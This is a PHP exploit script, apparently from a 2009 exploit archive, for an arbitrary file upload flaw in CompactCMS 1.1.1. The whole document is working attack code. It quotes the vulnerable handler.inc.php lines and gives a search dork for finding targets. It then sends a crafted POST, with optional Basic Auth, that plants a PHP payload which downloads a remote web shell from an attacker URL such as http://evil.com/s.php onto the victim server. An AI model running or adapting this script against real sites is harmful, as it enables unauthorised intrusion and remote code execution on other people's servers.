CompactCMS v 1.1.1 Remote Arbitrary File Upload Exploit PHP: <?php /** * @Product: MMIX - CompactCMS * @Version: 1.1.1 * @Site: CompactCMS.nl * @Dork: "© 2009 CompactCMS" * @Found by: Dimi4 * @Date: 8.04.2009 * @Greetz: antichat, UASC[http://uasc.org.ua] * @Bug Function [admin\handler.inc.php] [50-62 lines] : * */ ///////////////////////////////////////////////////////////////////// ## $name = htmlentities($_GET['file']); # ## $content = $_POST['content']; # ## $filename = "../content/".htmlentities($_GET['file']).".php"; # ## # ## if (is_writable($filename)) { # ## if (!$handle = fopen($filename, 'w')) { # ## echo "[ERR105] ".$sw_err02." (".$filename.")."; # ## exit; # ## } # ## if (fwrite($handle, $content) === FALSE) { # ## echo "[ERR106] ".$sw_err03." (".$filename.")."; # ## exit; # ## } # //////////////////////////////////////////////////////////////////// error_reporting(0); set_time_limit(0); function http_send($host, $packet) { if (($s = socket_create(AF_INET, SOCK_STREAM, SOL_TCP)) == false) die("\nsocket_create(): " . socket_strerror($s) . "\n"); if (socket_connect($s, $host, 80) == false) die("\nsocket_connect(): " . socket_strerror(socket_last_error()) . "\n"); socket_write($s, $packet, strlen($packet)); while ($m = socket_read($s, 2048)) $response .= $m; socket_close($s); return $response; } function help() { global $argv; echo "\n\n[?] Usage: ".$argv[0]." <host> <path> <shell>.\n\n"; echo "[?][?] Ex: ".$argv[0]." www.host.com /ct/ http://evil.com/s.php\n\n"; echo "[?] Usage: ".$argv[0]." <host> <path> <shell> <login> <pass>.\n\n"; echo "[?][?] Ex (Basic AUTH): ".$argv[0]." www.host.com /ct/ http://evil.com/s.php admin 12345\n\n"; die(); } if ($argv[1] == "") { help(); die(); } $host = $argv[1]; $path = $argv[2]; $shell = $argv[3]; $login = $argv[4]; $pass = $argv[5]; $tmpshell = "1123"; $shellname = "manpage.php"; $payload .= "action=Save changes&content=<?php copy('{$shell}', './{$shellname}'); unlink('{$tmpshell}.php'); header('Location:{$shellname}');?>\r\n\r\n"; echo(" ------------------------------------------------------------------ \tCompactCMS v 1.1.1 Remote Arbitrary File Upload Exploit ------------------------------------------------------------------\n\n"); echo("**\t Coded by Dimi4, greetz Antichat\n\n"); echo ("[+] Connecting to {$host}...\n"); $packet = "POST http://{$host}/{$path}/admin/handler.inc.php?file={$tmpshell} HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "prama: no-cache\r\n"; if(!empty($login) && !empty($pass)) { $packet .= "Authorization: Basic ".base64_encode($login.':'.$pass)."\r\n"; } $packet .= "Accept: text/html\r\n"; $packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; $packet .= "Content-Length: ".strlen($payload)."\n\n"; $packet .= $payload; $response = http_send($host, $packet); //echo ($response); if (preg_match("/WWW-Authenticate/i", $response)) { die("[-] Authorization Required. Set Login And Password or CORRECT them please!\n"); } else { echo ("[+] Sending Payload...\n"); echo ("[+] Downloading shell...\n"); if(!file_get_contents($shell)) { echo ("\t[!] Warning! Can't Download shell!\n"); $warning = "Maybe"; } echo ("\t[+]$warning Successful! Check: http://{$host}{$path}content/$tmpshell.php\n"); die(); } ?>
